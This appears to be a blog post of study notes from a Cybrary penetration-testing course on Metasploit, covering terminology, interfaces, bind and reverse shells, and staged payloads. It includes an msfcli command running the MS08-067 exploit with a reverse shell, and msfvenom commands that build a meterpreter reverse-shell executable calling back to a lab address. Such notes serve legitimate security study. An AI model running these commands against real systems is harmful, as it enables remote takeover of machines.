Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular *Exploits, payloads, auxiliaries, and more Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do after exploitation Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Exploitation Streamlining Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Example msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler Generic payload handler Catch payloads started outside of the framework For example payloads from Msfvenom msf> use multi/handler $: msvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |